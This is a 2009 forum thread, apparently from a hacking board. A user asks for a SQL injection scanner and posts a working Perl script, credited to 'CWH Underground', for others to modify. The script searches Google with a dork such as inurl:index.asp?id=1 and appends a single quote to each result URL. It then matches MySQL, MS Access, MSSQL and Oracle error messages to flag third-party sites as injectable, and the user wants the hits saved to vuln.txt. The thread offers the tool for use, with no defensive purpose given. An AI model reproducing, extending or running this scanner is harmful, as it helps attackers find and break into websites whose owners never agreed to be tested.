Нужен скрипт MSSQL error scanner

Discussion in 'PHP' started by kopele, 19 Mar 2009.

  1. kopele

    kopele New Member

    Joined:
    19 Nov 2008
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Нужен скрипт MSSQL error scanner

    Option

    1.scann via dork (test.asp?id=)
    hxxp://www.blackle.com/
    or
    2.scan from text file

    no problem if script is on pl,py or php :)
     
  2. kopele

    kopele New Member

    Joined:
    19 Nov 2008
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Hi all i need some perl guru help to modify this.

    Old Options

    1.Insert Dork:inurl:index.asp?id=1
    2.Total Query Pages (10 Links/Pages) :20

    to new option in 1 line dork + query
    and option to save result in vuln.txt file in the same directoy

    Insert Dork:inurl:index.asp?id=1 20 vuln.txt

    Code:
    #!/usr/bin/perl
    use LWP::Simple;
    use LWP::UserAgent;
    use HTTP::Request;
    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } 
    print "+++++++++++++++++++++++++++++++\n";
    print "+ SQL - Google Search +\n";
    print "+ CWH Underground +\n";
    print "+++++++++++++++++++++++++++++++\n\n";
    print "Insert Dork:";
    chomp( my $dork = <STDIN> );
    print "Total Query Pages (10 Links/Pages) :";
    chomp( my $page = <STDIN> );
    print "\n[+] Result:\n\n";
    for($start = 0;$start != $page*10;$start += 10)
    { 
    $t = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($t);
    if ($response->is_success)
    {
    $c = $response->content;
    @stuff = split(/<a href=/,$c);
    foreach $line(@stuff)
    {
    if($line =~/(.*) class=l/ig)
    {
    $out = $1;
    $out =~ s/\"//g;
    $out =~s/$/\'/; 
    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
    $error = $response->content();
    if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
    {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
    elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
    {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
    elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
    {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
    elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
    {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
    }
    }
    }
    }